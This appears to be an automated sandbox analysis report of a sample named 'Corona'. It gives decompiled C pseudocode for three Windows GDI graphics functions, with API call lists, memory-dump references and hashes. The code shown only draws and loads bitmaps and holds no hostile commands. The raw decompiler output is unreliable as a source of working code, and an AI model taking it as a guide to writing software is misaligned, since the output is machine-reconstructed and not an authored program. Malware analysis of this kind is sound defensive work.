                                  Function 0041D868, Relevance: 37.7, APIs: 25, Instructions: 248windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 52%
                                  			E0041D868(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
				int _v8;
				int _v12;
				char _v13;
				struct HDC__* _v20;
				void* _v24;
				void* _v28;
				long _v32;
				long _v36;
				intOrPtr _v40;
				intOrPtr* _t78;
				intOrPtr _t87;
				struct HDC__* _t88;
				intOrPtr _t91;
				struct HDC__* _t92;
				struct HDC__* _t135;
				int _t162;
				intOrPtr _t169;
				intOrPtr _t171;
				struct HDC__* _t173;
				int _t175;
				void* _t177;
				void* _t178;
				intOrPtr _t179;

				_t177 = _t178;
				_t179 = _t178 + 0xffffffdc;
				_v12 = __ecx;
				_v8 = __edx;
				_t173 = __eax;
				_t175 = _a16;
				_t162 = _a20;
				_v13 = 1;
				_t78 =  *0x451120; // 0x4500c4
				if( *_t78 != 2 || _t162 != _a40 || _t175 != _a36) {
					_v40 = 0;
					_push(0);
					L0040603C();
					_v20 = E0041D6C4(0);
					_push(_t177);
					_push(0x41dae8);
					_push( *[fs:eax]);
					 *[fs:eax] = _t179;
					_push(_t175);
					_push(_t162);
					_push(_a32);
					L00406034();
					_v24 = E0041D6C4(_a32);
					_v28 = SelectObject(_v20, _v24);
					_push(0);
					_t87 =  *0x45288c; // 0xa8080a0b
					_push(_t87);
					_t88 = _a32;
					_push(_t88);
					L0040619C();
					_v40 = _t88;
					_push(0);
					_push(_v40);
					_push(_a32);
					L0040619C();
					if(_v40 == 0) {
						_push(0xffffffff);
						_t91 =  *0x45288c; // 0xa8080a0b
						_push(_t91);
						_t92 = _v20;
						_push(_t92);
						L0040619C();
						_v40 = _t92;
					} else {
						_push(0xffffffff);
						_push(_v40);
						_t135 = _v20;
						_push(_t135);
						L0040619C();
						_v40 = _t135;
					}
					_push(_v20);
					L0040616C();
					StretchBlt(_v20, 0, 0, _t162, _t175, _a12, _a8, _a4, _t162, _t175, 0xcc0020);
					StretchBlt(_v20, 0, 0, _t162, _t175, _a32, _a28, _a24, _t162, _t175, 0x440328);
					_v32 = SetTextColor(_t173, 0);
					_v36 = SetBkColor(_t173, 0xffffff);
					StretchBlt(_t173, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t162, _t175, 0x8800c6);
					StretchBlt(_t173, _v8, _v12, _a40, _a36, _v20, 0, 0, _t162, _t175, 0x660046);
					SetTextColor(_t173, _v32);
					SetBkColor(_t173, _v36);
					if(_v28 != 0) {
						SelectObject(_v20, _v28);
					}
					DeleteObject(_v24);
					_pop(_t169);
					 *[fs:eax] = _t169;
					_push(E0041DAEF);
					if(_v40 != 0) {
						_push(0);
						_push(_v40);
						_push(_v20);
						L0040619C();
					}
					return DeleteDC(_v20);
				} else {
					_push(1);
					_push(1);
					_push(_a32);
					L00406034();
					_v24 = E0041D6C4(_a32);
					_v24 = SelectObject(_a12, _v24);
					_push(_t177);
					_push(0x41d93b);
					_push( *[fs:eax]);
					 *[fs:eax] = _t179;
					MaskBlt(_t173, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, E00406754(0xaa0029, 0xcc0020));
					_pop(_t171);
					 *[fs:eax] = _t171;
					_push(E0041DAEF);
					_v24 = SelectObject(_a12, _v24);
					return DeleteObject(_v24);
				}
			}


























                                  0x0041d869
                                  0x0041d86b
                                  0x0041d871
                                  0x0041d874
                                  0x0041d877
                                  0x0041d879
                                  0x0041d87c
                                  0x0041d87f
                                  0x0041d883
                                  0x0041d88b
                                  0x0041d944
                                  0x0041d947
                                  0x0041d949
                                  0x0041d953
                                  0x0041d958
                                  0x0041d959
                                  0x0041d95e
                                  0x0041d961
                                  0x0041d964
                                  0x0041d965
                                  0x0041d969
                                  0x0041d96a
                                  0x0041d974
                                  0x0041d984
                                  0x0041d987
                                  0x0041d989
                                  0x0041d98e
                                  0x0041d98f
                                  0x0041d992
                                  0x0041d993
                                  0x0041d998
                                  0x0041d99b
                                  0x0041d9a0
                                  0x0041d9a4
                                  0x0041d9a5
                                  0x0041d9ae
                                  0x0041d9c4
                                  0x0041d9c6
                                  0x0041d9cb
                                  0x0041d9cc
                                  0x0041d9cf
                                  0x0041d9d0
                                  0x0041d9d5
                                  0x0041d9b0
                                  0x0041d9b0
                                  0x0041d9b5
                                  0x0041d9b6
                                  0x0041d9b9
                                  0x0041d9ba
                                  0x0041d9bf
                                  0x0041d9bf
                                  0x0041d9db
                                  0x0041d9dc
                                  0x0041d9fe
                                  0x0041da20
                                  0x0041da2d
                                  0x0041da3b
                                  0x0041da62
                                  0x0041da87
                                  0x0041da91
                                  0x0041da9b
                                  0x0041daa4
                                  0x0041daae
                                  0x0041daae
                                  0x0041dab7
                                  0x0041dabe
                                  0x0041dac1
                                  0x0041dac4
                                  0x0041dacd
                                  0x0041dacf
                                  0x0041dad4
                                  0x0041dad8
                                  0x0041dad9
                                  0x0041dad9
                                  0x0041dae7
                                  0x0041d8a3
                                  0x0041d8a3
                                  0x0041d8a5
                                  0x0041d8aa
                                  0x0041d8ab
                                  0x0041d8b5
                                  0x0041d8c5
                                  0x0041d8ca
                                  0x0041d8cb
                                  0x0041d8d0
                                  0x0041d8d3
                                  0x0041d90f
                                  0x0041d916
                                  0x0041d919
                                  0x0041d91c
                                  0x0041d92e
                                  0x0041d93a
                                  0x0041d93a

                                  APIs
                                  • 72E7A520.GDI32(?,00000001,00000001), ref: 0041D8AB
                                  • SelectObject.GDI32(?,?), ref: 0041D8C0
                                  • MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,0041D93B,?,?), ref: 0041D90F
                                  • SelectObject.GDI32(?,?), ref: 0041D929
                                  • DeleteObject.GDI32(?), ref: 0041D935
                                  • 72E7A590.GDI32(00000000), ref: 0041D949
                                  • 72E7A520.GDI32(?,?,?,00000000,0041DAE8,?,00000000), ref: 0041D96A
                                  • SelectObject.GDI32(?,?), ref: 0041D97F
                                  • 72E7B410.GDI32(?,A8080A0B,00000000,?,?,?,?,?,00000000,0041DAE8,?,00000000), ref: 0041D993
                                  • 72E7B410.GDI32(?,?,00000000,?,A8080A0B,00000000,?,?,?,?,?,00000000,0041DAE8,?,00000000), ref: 0041D9A5
                                  • 72E7B410.GDI32(?,00000000,000000FF,?,?,00000000,?,A8080A0B,00000000,?,?,?,?,?,00000000,0041DAE8), ref: 0041D9BA
                                  • 72E7B410.GDI32(?,A8080A0B,000000FF,?,?,00000000,?,A8080A0B,00000000,?,?,?,?,?,00000000,0041DAE8), ref: 0041D9D0
                                  • 72E7B150.GDI32(?,?,A8080A0B,000000FF,?,?,00000000,?,A8080A0B,00000000,?,?,?,?,?,00000000), ref: 0041D9DC
                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0041D9FE
                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 0041DA20
                                  • SetTextColor.GDI32(?,00000000), ref: 0041DA28
                                  • SetBkColor.GDI32(?,00FFFFFF), ref: 0041DA36
                                  • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 0041DA62
                                  • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 0041DA87
                                  • SetTextColor.GDI32(?,?), ref: 0041DA91
                                  • SetBkColor.GDI32(?,?), ref: 0041DA9B
                                  • SelectObject.GDI32(?,00000000), ref: 0041DAAE
                                  • DeleteObject.GDI32(?), ref: 0041DAB7
                                  • 72E7B410.GDI32(?,00000000,00000000,0041DAEF,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 0041DAD9
                                  • DeleteDC.GDI32(?), ref: 0041DAE2
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Object$B410$ColorSelectStretch$Delete$A520Text$A590B150Mask
                                  • String ID:
                                  • API String ID: 3348367721-0
                                  • Opcode ID: adb07ece7ecb609679bd4935c2d80a1b63db15c13550395349cd91ba3d62ffa9
                                  • Instruction ID: fe795ed8509bb66459287f9b660ace3d829babc49c552c1c6e31242553650d1f
                                  • Opcode Fuzzy Hash: adb07ece7ecb609679bd4935c2d80a1b63db15c13550395349cd91ba3d62ffa9
                                  • Instruction Fuzzy Hash: 6781B2B1A00209AFDB50EFA9CD81FAF77ECAB0D314F11045AF618E7281C679AD508B65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00420E88, Relevance: 31.7, APIs: 21, Instructions: 194windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 51%
                                  			E00420E88(void* __eax, long __ecx, intOrPtr __edx) {
				void* _v8;
				intOrPtr _v12;
				struct HDC__* _v16;
				struct HDC__* _v20;
				char _v21;
				void* _v28;
				void* _v32;
				intOrPtr _v92;
				intOrPtr _v96;
				int _v108;
				int _v112;
				void _v116;
				void* _t64;
				int _t65;
				intOrPtr _t66;
				long _t77;
				void* _t107;
				intOrPtr _t116;
				intOrPtr _t117;
				long _t120;
				intOrPtr _t123;
				void* _t127;
				void* _t129;
				intOrPtr _t130;

				_t127 = _t129;
				_t130 = _t129 + 0xffffff90;
				_t120 = __ecx;
				_t123 = __edx;
				_t107 = __eax;
				_v8 = 0;
				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
					return _v8;
				} else {
					E0042037C(_t107);
					_v12 = 0;
					_v20 = 0;
					_push(_t127);
					_push(0x421083);
					_push( *[fs:eax]);
					 *[fs:eax] = _t130;
					_push(0);
					L0040638C();
					_v12 = E0041D6C4(0);
					_push(_v12);
					L0040603C();
					_v20 = E0041D6C4(_v12);
					_push(0);
					_push(1);
					_push(1);
					_push(_v108);
					_t64 = _v112;
					_push(_t64);
					L00406024();
					_v8 = _t64;
					if(_v8 == 0) {
						L17:
						_t65 = 0;
						_pop(_t116);
						 *[fs:eax] = _t116;
						_push(0x42108a);
						if(_v20 != 0) {
							_t65 = DeleteDC(_v20);
						}
						if(_v12 != 0) {
							_t66 = _v12;
							_push(_t66);
							_push(0);
							L004065C4();
							return _t66;
						}
						return _t65;
					} else {
						_v32 = SelectObject(_v20, _v8);
						if(__ecx != 0x1fffffff) {
							_push(_v12);
							L0040603C();
							_v16 = E0041D6C4(_v12);
							_push(_t127);
							_push(0x42103b);
							_push( *[fs:eax]);
							 *[fs:eax] = _t130;
							if(_v96 == 0) {
								_v21 = 0;
							} else {
								_v21 = 1;
								_v92 = 0;
								_t107 = E004207C0(_t107, _t123, _t123, 0,  &_v116);
							}
							_v28 = SelectObject(_v16, _t107);
							if(_t123 != 0) {
								_push(0);
								_push(_t123);
								_push(_v16);
								L0040619C();
								_push(_v16);
								L0040616C();
								_push(0);
								_push(_t123);
								_push(_v20);
								L0040619C();
								_push(_v20);
								L0040616C();
							}
							_t77 = SetBkColor(_v16, _t120);
							_push(0xcc0020);
							_push(0);
							_push(0);
							_push(_v16);
							_push(_v108);
							_push(_v112);
							_push(0);
							_push(0);
							_push(_v20);
							L00406014();
							SetBkColor(_v16, _t77);
							if(_v28 != 0) {
								SelectObject(_v16, _v28);
							}
							if(_v21 != 0) {
								DeleteObject(_t107);
							}
							_pop(_t117);
							 *[fs:eax] = _t117;
							_push(0x421042);
							return DeleteDC(_v16);
						} else {
							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
							if(_v32 != 0) {
								SelectObject(_v20, _v32);
							}
							goto L17;
						}
					}
				}
			}



























                                  0x00420e89
                                  0x00420e8b
                                  0x00420e91
                                  0x00420e93
                                  0x00420e95
                                  0x00420e99
                                  0x00420e9e
                                  0x00421093
                                  0x00420eb8
                                  0x00420eba
                                  0x00420ec1
                                  0x00420ec6
                                  0x00420ecb
                                  0x00420ecc
                                  0x00420ed1
                                  0x00420ed4
                                  0x00420ed7
                                  0x00420ed9
                                  0x00420ee3
                                  0x00420ee9
                                  0x00420eea
                                  0x00420ef4
                                  0x00420ef7
                                  0x00420ef9
                                  0x00420efb
                                  0x00420f00
                                  0x00420f01
                                  0x00420f04
                                  0x00420f05
                                  0x00420f0a
                                  0x00420f11
                                  0x00421055
                                  0x00421055
                                  0x00421057
                                  0x0042105a
                                  0x0042105d
                                  0x00421066
                                  0x0042106c
                                  0x0042106c
                                  0x00421075
                                  0x00421077
                                  0x0042107a
                                  0x0042107b
                                  0x0042107d
                                  0x00000000
                                  0x0042107d
                                  0x00421082
                                  0x00420f17
                                  0x00420f24
                                  0x00420f2d
                                  0x00420f4e
                                  0x00420f4f
                                  0x00420f59
                                  0x00420f5e
                                  0x00420f5f
                                  0x00420f64
                                  0x00420f67
                                  0x00420f6e
                                  0x00420f8e
                                  0x00420f70
                                  0x00420f70
                                  0x00420f76
                                  0x00420f8a
                                  0x00420f8a
                                  0x00420f9c
                                  0x00420fa1
                                  0x00420fa3
                                  0x00420fa5
                                  0x00420fa9
                                  0x00420faa
                                  0x00420fb2
                                  0x00420fb3
                                  0x00420fb8
                                  0x00420fba
                                  0x00420fbe
                                  0x00420fbf
                                  0x00420fc7
                                  0x00420fc8
                                  0x00420fc8
                                  0x00420fd2
                                  0x00420fd9
                                  0x00420fde
                                  0x00420fe0
                                  0x00420fe5
                                  0x00420fe9
                                  0x00420fed
                                  0x00420fee
                                  0x00420ff0
                                  0x00420ff5
                                  0x00420ff6
                                  0x00421000
                                  0x00421009
                                  0x00421013
                                  0x00421013
                                  0x0042101c
                                  0x0042101f
                                  0x0042101f
                                  0x00421026
                                  0x00421029
                                  0x0042102c
                                  0x0042103a
                                  0x00420f2f
                                  0x00420f41
                                  0x00421046
                                  0x00421050
                                  0x00421050
                                  0x00000000
                                  0x00421046
                                  0x00420f2d
                                  0x00420f11

                                  APIs
                                  • GetObjectA.GDI32(?,00000054,?), ref: 00420EAB
                                  • 72E7AC50.USER32(00000000,00000000,00421083,?,?,00000054,?), ref: 00420ED9
                                  • 72E7A590.GDI32(?,00000000,00000000,00421083,?,?,00000054,?), ref: 00420EEA
                                  • 72E7A410.GDI32(?,?,00000001,00000001,00000000,?,00000000,00000000,00421083,?,?,00000054,?), ref: 00420F05
                                  • SelectObject.GDI32(?,00000000), ref: 00420F1F
                                  • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 00420F41
                                  • 72E7A590.GDI32(?,?,00000000,?,?,00000001,00000001,00000000,?,00000000,00000000,00421083,?,?,00000054,?), ref: 00420F4F
                                  • SelectObject.GDI32(?), ref: 00420F97
                                  • 72E7B410.GDI32(?,?,00000000,?,?,00000000,0042103B,?,?,?,00000000,?,?,00000001,00000001,00000000), ref: 00420FAA
                                  • 72E7B150.GDI32(?,?,?,00000000,?,?,00000000,0042103B,?,?,?,00000000,?,?,00000001,00000001), ref: 00420FB3
                                  • 72E7B410.GDI32(?,?,00000000,?,?,?,00000000,?,?,00000000,0042103B,?,?,?,00000000,?), ref: 00420FBF
                                  • 72E7B150.GDI32(?,?,?,00000000,?,?,?,00000000,?,?,00000000,0042103B,?,?,?,00000000), ref: 00420FC8
                                  • SetBkColor.GDI32(?), ref: 00420FD2
                                  • 72E897E0.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,?,?,?,00000000,0042103B), ref: 00420FF6
                                  • SetBkColor.GDI32(?,00000000), ref: 00421000
                                  • SelectObject.GDI32(?,00000000), ref: 00421013
                                  • DeleteObject.GDI32 ref: 0042101F
                                  • DeleteDC.GDI32(?), ref: 00421035
                                  • SelectObject.GDI32(?,00000000), ref: 00421050
                                  • DeleteDC.GDI32(00000000), ref: 0042106C
                                  • 72E7B380.USER32(00000000,00000000,0042108A,00000001,00000000,?,00000000,00000000,00421083,?,?,00000054,?), ref: 0042107D
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Object$Select$Delete$A590B150B410Color$A410B380E897
                                  • String ID:
                                  • API String ID: 4241548881-0
                                  • Opcode ID: 7e8de31d918b1b9a66cbf19770f8cfe7b2eeed5520028ff9359bb14997dfe728
                                  • Instruction ID: 1d157faa3061cef535302c33e3afb78cf33dd2e637aae01a1b54a8e383789e66
                                  • Opcode Fuzzy Hash: 7e8de31d918b1b9a66cbf19770f8cfe7b2eeed5520028ff9359bb14997dfe728
                                  • Instruction Fuzzy Hash: A4515F71F40254AFDB10DBE9DC45FAFB7FCAB08304F51446AB605EB292C6799940CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00421BA4, Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 351COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 65%
                                  			E00421BA4(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
				intOrPtr _v8;
				intOrPtr* _v12;
				void* _v16;
				struct HDC__* _v20;
				char _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v37;
				intOrPtr _v44;
				void* _v48;
				struct HDC__* _v52;
				intOrPtr _v56;
				intOrPtr* _v60;
				intOrPtr* _v64;
				short _v66;
				short _v68;
				signed short _v70;
				signed short _v72;
				void* _v76;
				intOrPtr _v172;
				char _v174;
				intOrPtr _t150;
				signed int _t160;
				intOrPtr _t163;
				void* _t166;
				void* _t174;
				void* _t183;
				signed int _t188;
				intOrPtr _t189;
				struct HDC__* _t190;
				struct HDC__* _t204;
				signed int _t208;
				signed short _t214;
				intOrPtr _t241;
				intOrPtr* _t245;
				intOrPtr _t251;
				intOrPtr _t289;
				intOrPtr _t290;
				intOrPtr _t295;
				signed int _t297;
				signed int _t317;
				void* _t319;
				void* _t320;
				signed int _t321;
				void* _t322;
				void* _t323;
				void* _t324;
				intOrPtr _t325;

				_t316 = __edi;
				_t323 = _t324;
				_t325 = _t324 + 0xffffff54;
				_t319 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v52 = 0;
				_v44 = 0;
				_v60 = 0;
				 *((intOrPtr*)( *_v12 + 0xc))(__edi, __esi, __ebx, _t322);
				_v37 = _v36 == 0xc;
				if(_v37 != 0) {
					_v36 = 0x28;
				}
				_v28 = E004026BC(_v36 + 0x40c);
				_v64 = _v28;
				_push(_t323);
				_push(0x4220c1);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				_push(_t323);
				_push(0x422094);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				if(_v37 == 0) {
					 *((intOrPtr*)( *_v12 + 0xc))();
					_t320 = _t319 - _v36;
					_t150 =  *((intOrPtr*)(_v64 + 0x10));
					if(_t150 != 3 && _t150 != 0) {
						_v60 = E004030CC(1);
						if(_a4 == 0) {
							E00402B18( &_v174, 0xe);
							_v174 = 0x4d42;
							_v172 = _v36 + _t320;
							_a4 =  &_v174;
						}
						 *((intOrPtr*)( *_v60 + 0x10))();
						 *((intOrPtr*)( *_v60 + 0x10))();
						 *((intOrPtr*)( *_v60 + 0x10))();
						E004155D4(_v60,  *_v60, _v12, _t316, _t320, _t320, 0);
						 *((intOrPtr*)( *_v60 + 0x14))();
						_v12 = _v60;
					}
				} else {
					 *((intOrPtr*)( *_v12 + 0xc))();
					_t251 = _v64;
					E00402B18(_t251, 0x28);
					_t241 = _t251;
					 *(_t241 + 4) = _v72 & 0x0000ffff;
					 *(_t241 + 8) = _v70 & 0x0000ffff;
					 *((short*)(_t241 + 0xc)) = _v68;
					 *((short*)(_t241 + 0xe)) = _v66;
					_t320 = _t319 - 0xc;
				}
				_t245 = _v64;
				 *_t245 = _v36;
				_v32 = _v28 + _v36;
				if( *((short*)(_t245 + 0xc)) != 1) {
					E0041D5A4();
				}
				if(_v36 == 0x28) {
					_t214 =  *(_t245 + 0xe);
					if(_t214 == 0x10 || _t214 == 0x20) {
						if( *((intOrPtr*)(_t245 + 0x10)) == 3) {
							E00415564(_v12, 0xc, _v32);
							_v32 = _v32 + 0xc;
							_t320 = _t320 - 0xc;
						}
					}
				}
				if( *(_t245 + 0x20) == 0) {
					 *(_t245 + 0x20) = E0041D834( *(_t245 + 0xe));
				}
				_t317 = _v37 & 0x000000ff;
				_t257 =  *(_t245 + 0x20) * 0;
				E00415564(_v12,  *(_t245 + 0x20) * 0, _v32);
				_t321 = _t320 -  *(_t245 + 0x20) * 0;
				if( *(_t245 + 0x14) == 0) {
					_t297 =  *(_t245 + 0xe) & 0x0000ffff;
					_t208 = E0041D854( *((intOrPtr*)(_t245 + 4)), 0x20, _t297);
					asm("cdq");
					_t257 = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
					 *(_t245 + 0x14) = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
				}
				_t160 =  *(_t245 + 0x14);
				if(_t321 > _t160) {
					_t321 = _t160;
				}
				if(_v37 != 0) {
					_t160 = E0041DAFC(_v32);
				}
				_push(0);
				L0040638C();
				_v16 = E0041D6C4(_t160);
				_push(_t323);
				_push(0x42200f);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				_t163 =  *((intOrPtr*)(_v64 + 0x10));
				if(_t163 == 0 || _t163 == 3) {
					if( *0x450444 == 0) {
						_push(0);
						_push(0);
						_push( &_v24);
						_push(0);
						_push(_v28);
						_t166 = _v16;
						_push(_t166);
						L00406044();
						_v44 = _t166;
						if(_v44 == 0 || _v24 == 0) {
							if(GetLastError() != 0) {
								E0040C5C8(_t245, _t257, _t317, _t321);
							} else {
								E0041D5A4();
							}
						}
						_push(_t323);
						_push( *[fs:eax]);
						 *[fs:eax] = _t325;
						E00415564(_v12, _t321, _v24);
						_pop(_t289);
						 *[fs:eax] = _t289;
						_t290 = 0x421fde;
						 *[fs:eax] = _t290;
						_push(0x422016);
						_t174 = _v16;
						_push(_t174);
						_push(0);
						L004065C4();
						return _t174;
					} else {
						goto L27;
					}
				} else {
					L27:
					_v20 = 0;
					_v24 = E004026BC(_t321);
					_push(_t323);
					_push(0x421f77);
					_push( *[fs:edx]);
					 *[fs:edx] = _t325;
					_t263 = _t321;
					E00415564(_v12, _t321, _v24);
					_push(_v16);
					L0040603C();
					_v20 = E0041D6C4(_v16);
					_push(1);
					_push(1);
					_t183 = _v16;
					_push(_t183);
					L00406034();
					_v48 = SelectObject(_v20, _t183);
					_v56 = 0;
					_t188 =  *(_v64 + 0x20);
					if(_t188 > 0) {
						_t263 = _t188;
						_v52 = E0041DDB4(0, _t188);
						_push(0);
						_push(_v52);
						_t204 = _v20;
						_push(_t204);
						L0040619C();
						_v56 = _t204;
						_push(_v20);
						L0040616C();
					}
					_push(_t323);
					_push(0x421f4b);
					_push( *[fs:edx]);
					 *[fs:edx] = _t325;
					_push(0);
					_t189 = _v28;
					_push(_t189);
					_push(_v24);
					_push(4);
					_push(_t189);
					_t190 = _v20;
					_push(_t190);
					L0040604C();
					_v44 = _t190;
					if(_v44 == 0) {
						if(GetLastError() != 0) {
							E0040C5C8(_t245, _t263, _t317, _t321);
						} else {
							E0041D5A4();
						}
					}
					_pop(_t295);
					 *[fs:eax] = _t295;
					_push(0x421f52);
					if(_v56 != 0) {
						_push(0xffffffff);
						_push(_v56);
						_push(_v20);
						L0040619C();
					}
					return DeleteObject(SelectObject(_v20, _v48));
				}
			}




















































                                  0x00421ba4
                                  0x00421ba5
                                  0x00421ba7
                                  0x00421bb0
                                  0x00421bb2
                                  0x00421bb5
                                  0x00421bba
                                  0x00421bbf
                                  0x00421bc4
                                  0x00421bd4
                                  0x00421bdb
                                  0x00421be3
                                  0x00421be5
                                  0x00421be5
                                  0x00421bfc
                                  0x00421c02
                                  0x00421c07
                                  0x00421c08
                                  0x00421c0d
                                  0x00421c10
                                  0x00421c15
                                  0x00421c16
                                  0x00421c1b
                                  0x00421c1e
                                  0x00421c25
                                  0x00421c84
                                  0x00421c87
                                  0x00421c8d
                                  0x00421c93
                                  0x00421cad
                                  0x00421cb4
                                  0x00421cc3
                                  0x00421cc8
                                  0x00421cd6
                                  0x00421ce2
                                  0x00421ce2
                                  0x00421cf2
                                  0x00421d02
                                  0x00421d16
                                  0x00421d25
                                  0x00421d37
                                  0x00421d3d
                                  0x00421d3d
                                  0x00421c27
                                  0x00421c37
                                  0x00421c3a
                                  0x00421c46
                                  0x00421c4b
                                  0x00421c51
                                  0x00421c58
                                  0x00421c5f
                                  0x00421c67
                                  0x00421c6b
                                  0x00421c6b
                                  0x00421d40
                                  0x00421d46
                                  0x00421d4e
                                  0x00421d56
                                  0x00421d58
                                  0x00421d58
                                  0x00421d61
                                  0x00421d63
                                  0x00421d6b
                                  0x00421d77
                                  0x00421d84
                                  0x00421d89
                                  0x00421d8d
                                  0x00421d8d
                                  0x00421d77
                                  0x00421d6b
                                  0x00421d94
                                  0x00421d9f
                                  0x00421d9f
                                  0x00421da5
                                  0x00421db1
                                  0x00421dba
                                  0x00421dcc
                                  0x00421dd2
                                  0x00421dd4
                                  0x00421de0
                                  0x00421dea
                                  0x00421def
                                  0x00421df2
                                  0x00421df2
                                  0x00421df5
                                  0x00421dfa
                                  0x00421dfc
                                  0x00421dfc
                                  0x00421e02
                                  0x00421e07
                                  0x00421e07
                                  0x00421e0c
                                  0x00421e0e
                                  0x00421e18
                                  0x00421e1d
                                  0x00421e1e
                                  0x00421e23
                                  0x00421e26
                                  0x00421e2c
                                  0x00421e31
                                  0x00421e3f
                                  0x00421f7e
                                  0x00421f80
                                  0x00421f85
                                  0x00421f86
                                  0x00421f8b
                                  0x00421f8c
                                  0x00421f8f
                                  0x00421f90
                                  0x00421f95
                                  0x00421f9c
                                  0x00421fab
                                  0x00421fb4
                                  0x00421fad
                                  0x00421fad
                                  0x00421fad
                                  0x00421fab
                                  0x00421fbb
                                  0x00421fc1
                                  0x00421fc4
                                  0x00421fcf
                                  0x00421fd6
                                  0x00421fd9
                                  0x00421ff8
                                  0x00421ffb
                                  0x00421ffe
                                  0x00422003
                                  0x00422006
                                  0x00422007
                                  0x00422009
                                  0x0042200e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00421e45
                                  0x00421e45
                                  0x00421e47
                                  0x00421e51
                                  0x00421e56
                                  0x00421e57
                                  0x00421e5c
                                  0x00421e5f
                                  0x00421e65
                                  0x00421e6a
                                  0x00421e72
                                  0x00421e73
                                  0x00421e7d
                                  0x00421e80
                                  0x00421e82
                                  0x00421e84
                                  0x00421e87
                                  0x00421e88
                                  0x00421e97
                                  0x00421e9c
                                  0x00421ea2
                                  0x00421ea7
                                  0x00421ea9
                                  0x00421eb5
                                  0x00421eb8
                                  0x00421ebd
                                  0x00421ebe
                                  0x00421ec1
                                  0x00421ec2
                                  0x00421ec7
                                  0x00421ecd
                                  0x00421ece
                                  0x00421ece
                                  0x00421ed5
                                  0x00421ed6
                                  0x00421edb
                                  0x00421ede
                                  0x00421ee1
                                  0x00421ee3
                                  0x00421ee6
                                  0x00421eea
                                  0x00421eeb
                                  0x00421eed
                                  0x00421eee
                                  0x00421ef1
                                  0x00421ef2
                                  0x00421ef7
                                  0x00421efe
                                  0x00421f07
                                  0x00421f10
                                  0x00421f09
                                  0x00421f09
                                  0x00421f09
                                  0x00421f07
                                  0x00421f17
                                  0x00421f1a
                                  0x00421f1d
                                  0x00421f26
                                  0x00421f28
                                  0x00421f2d
                                  0x00421f31
                                  0x00421f32
                                  0x00421f32
                                  0x00421f4a
                                  0x00421f4a

                                  APIs
                                  • 72E7AC50.USER32(00000000,?,00000000,004220C1,?,?), ref: 00421E0E
                                  • 72E7A590.GDI32(00000001,00000000,00421F77,?,00000000,0042200F,?,00000000,?,00000000,004220C1,?,?), ref: 00421E73
                                  • 72E7A520.GDI32(00000001,00000001,00000001,00000001,00000000,00421F77,?,00000000,0042200F,?,00000000,?,00000000,004220C1,?,?), ref: 00421E88
                                  • SelectObject.GDI32(?,00000000), ref: 00421E92
                                  • 72E7B410.GDI32(?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,00421F77,?,00000000,0042200F,?,00000000), ref: 00421EC2
                                  • 72E7B150.GDI32(?,?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,00421F77,?,00000000,0042200F), ref: 00421ECE
                                  • 72E7A7F0.GDI32(?,?,00000004,00000000,?,00000000,00000000,00421F4B,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 00421EF2
